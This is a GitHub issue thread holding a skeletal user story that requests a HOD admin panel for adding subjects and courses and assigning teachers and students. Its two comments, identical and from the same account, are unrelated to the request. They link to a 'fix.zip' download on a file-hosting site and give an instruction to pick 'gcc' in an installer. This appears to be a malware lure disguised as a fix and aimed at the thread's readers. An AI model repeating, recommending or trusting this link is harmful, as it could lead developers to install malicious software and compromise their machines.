### ISSUE TITLE
HOD Panel

### ISSUE THREAD

**Issue by subodhadhikari2023** [subodhadhikari2023/CampusConnect#57]
### User Story

**Title:** 

**As a** HOD

**I want to** GUI panel

**So that** I can add subjects, add courses, and assign teachers and students on it
**Acceptance Criteria:**

**Comment by diablo00001** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by diablo00001** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."
